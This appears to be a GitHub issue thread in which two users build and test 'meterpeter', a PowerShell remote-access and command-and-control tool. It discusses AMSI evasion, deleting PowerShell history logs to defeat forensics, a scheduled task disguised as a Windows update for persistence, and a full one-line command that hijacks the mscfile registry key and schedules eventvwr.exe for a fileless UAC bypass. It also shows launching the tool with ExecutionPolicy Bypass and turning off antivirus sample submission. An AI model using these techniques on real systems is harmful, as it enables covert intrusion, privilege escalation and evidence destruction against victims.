Amsi Evasion

Agent.ps1

Amsi Evasion

Let me know when I can do video✅💯🔥

Or more tests✅💯🔥

iam current adding a privilege escalation module to it (SDCLT) ..

Remmenber that this bypass technic its only valid for the current process console ..

(If you open another console then AMSI will be active and working)

Oh wow, nice ✅💯🔥, thank you, Learning a lot from you thank you!

you can have the latest version of meterpeter here: https://github.com/r00t-3xp10it/meterpeter

Cool adding link to Meterpeter vid✅💯🔥

iam having problems to triger SDCLT priv escal ...
so.. iam going with this one 'enigma_fileless_uac_bypass.rb' that i know it works (tomorrow)...
https://github.com/r00t-3xp10it/msf-auxiliarys/blob/master/windows/local-privilege-escalation/enigma_fileless_uac_bypass.rb

Change Remote Files MACE

Change Target Desktop Wallpaper ???

hey @codings9 look at this one that ive just discorver ... (pure luck) ...

while testing meterpeter [search for passwors in text files] ....
i have notest one file thats storing all commands beeing executed in powershell by meterpeter client or simple by using ps prompt...
LOOK AT THE AMOUNT OF INFO THAT THIS FILE CONTAINS ABOUT PS CONSOLE PROCESS...UAU ..IT AS THE ALL SCRIPT STORED..

"Iam i think to myselft from one forensic prespective" ... BUSTED ...
so... i imediatly reacted to this thread ... by... rewriting the contents of that file in modules like [dellogs] or [listpass] ...

🥇

Wow, that’s amazing✅💯🔥, so powershell keeps logs?
In ConsoleHost_History-wow great catch

note-to-self (priv escal in persistence)

1 - persistence schedule every 10 minuts

schtasks /create /sc minute /mo 10 /tn "taskname" /tr %tmp%\update-KB132645.vbs

2 - privilege escalation using filess eventvwr technic

• a) add hkcu key poiting to client trigger.vbs file
• b) scheldule start eventvwr every 10 minuts
  • schtasks at restart will start eventvwr, eventvwr starts client trigger.vbs, client starts with SYSTEM privileges .. <- we just need to restart target, start meterpeter listenner to wait for connection ...

New-ItemProperty HKCU\...\trigger-Client.vbs
schtasks .... eventvwr.exe

3 - restart target machine

4 - start meterpeter to recive SYSTEM connection

Privilege Escalation in one line (oneliner)

• 1º - reg add HKCU.. /d 'PS command to start client.ps1'
  'This reg key will auto-elevate to SYSTEM the child process spawned (Client.ps1)' ..
  • 2º - Schedule task to start eventvwr.exe every xx minuts (defined by attacker)
    'This Function allow us to have time to restart meterpeter to recive the connection again from Client'
    • 3º - Restart meterpeter to recive the SYSTEM connection back
      'This function will also alow us to persiste our payload, the diferense its that Client will beacon home from xx to xx minuts compared with the other meterpeter persiste modules'

$Command = "cmd /R REG ADD 'HKCU\Software\Classes\mscfile\shell\open\command' /ve /t REG_SZ /d 'cmd /R powershell -Execution Bypass -w 1 -NoProfile -File %tmp%\Update-KB4524147.ps1';schtasks /create /sc minute /mo $stime /tn `"KB4524147`" /tr `"%windir%\system32\eventvwr.exe`";schtasks /Query /tn `"KB4524147`" `> dellog.txt;write-host "`n`n" `>`> dellog.txt;echo `"   Privilege Escalation beacons every: $stime (minuts)`" `>`> dellog.txt;echo `"   Restart 'meterpeter' to recive the SYSTEM connection.`" `>`> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force";

IT DOES NOT WORK: AV FLAGS THIS REGKEY ....

Hey @codings9 iam porting meterpeter project to venom ..

i need you to test something for me ...

• execute in bash terminal

which powershell

And report back if this command checks for powershell install under Linux distros

• Question: did you required to do chmod +x meterpeter.ps1 ????

Hey @codings9 iam porting meterpeter project to venom ..

i need you to test something for me ...

execute in bash terminal
which powershell

which powershell does not execute.
To execute powershell in Kali i have to use
pwsh to get the powershell, shell.
And report back if this command checks for powershell install under Linux distros

Question: did you required to do chmod +x meterpeter.ps1 ????
No, Not required under pwsh.
Reference:
https://youtu.be/CmMbWmN246E

When you execute which powershell in the BASH terminal .. whats the response ???

I dont want to start powershell (which present appl installed full path)

Nothing here you go:

What folder its powershell installed do you know ? /usr/bin/powershell ??

check this locations.

/usr/bin/pwsh
/opt/microsoft/powershell
/usr/local/share/powershell/Modules

/usr/bin/pwsh

Exists, they reference powershell as pwsh😂🤣

So we are looking for pwsh not powershell, lol

which pwsh?
/usr/bin/pwsh

exelent ...

which pwsh?
/usr/bin/pwsh

i need to know if venom user was powershell installed before running meterpeter.ps1 .. <--- checking the existence of this folder works fine..
and i need to know if attacker its x64 bits arch (M$ does not give PS to x32 bits) .. <--- already done ..

Sweet✅💯🔥

TASK

• Record 'meterpeter' [Window vs Windows] oficial release video ..
  
  

Task Description

hey @codings9 i need your help again ...

To record a video tutorial about 'meterpeter' windows VS Windows  ...
using the 'new terminal windows' configurated to run meterpeter tool ..

New Windows Terminal (M$)

---

Step-By-Step

• 1º - Download new meterpeter project (oficial release)

git clone https://github.com/r00t-3xp10it/meterpeter.git

• 2º - Install new windows terminal
  Install new windows terminal (Under Windows Distros)
  

• 3º - download/install new microsoft font (Cascadia.ttf)
  Microsoft Cascadia code Font
  

• 4º - Add meterpeter tool to the new terminal TAB list

Remenber to change the PATHs to point to your Local meterpeter installation

1º - Create a new GUID for meterpeter tool
     To Creat new GUID visit: http://new-guid.com/

2º - press <'settings'> button in 'new terminal' and copy paste the follow code under
     "profiles":  -> "list":

            },  // <-- REMMENBER TO ADD , IN PREVIOUS CLOSE BRACKLETS FUNCTION ...
                // BEFORE ADDING A NEW FUNCTION TO YOUR PROFILE.JSON FILE

            {
                // Make changes here to the meterpeter profile
                "guid": "{1972e6a7-daef-4cfc-8180-3eecfef9630d}",
                "name": "meterpeter C2",
                "fontFace": "Cascadia Code",
                "backgroundImageStretchMode" : "uniformToFill",
                "backgroundImage" : "%USERPROFILE%\\Desktop\\meterpeter\\mimiRatz\\darkside.gif",  // <-- Terminal animated background gif Path
                "commandline": "powershell.exe -ExecutionPolicy Bypass -NoLogo -NoExit -File \"%USERPROFILE%\\Desktop\\meterpeter\\meterpeter.ps1\"",    // <-- meterpeter.ps1 script Path
                "startingDirectory" : "%USERPROFILE%\\Desktop\\meterpeter",               // <-- meterpeter folder Path
                "icon" : "%USERPROFILE%\\Desktop\\meterpeter\\mimiRatz\\Alien-icon.png",  // <-- Terminal tab icon Path
                "hidden": false
            }

[i] my profile.json file (Configuration example)

[i] meterpeter WIKI pages

Doing the video, just be aware that ps1 file was not downloaded via the bat- i manually moved it to disk and ran it. And Windows picks up the file soon as it touches disk, sample submission off. I had to allow it for the video-I think i understand why Microsoft bought github...now...they have access to all of this...code....Don’t worry will not show on video.

The Terminal is amazing love the integration with MeterPeter✅💯🔥

https://youtu.be/k9aX3yBQrEQ

hey thanks ..ive just arrived home ..

Lol, no worries anytime...✅💯🔥, thank you!

👍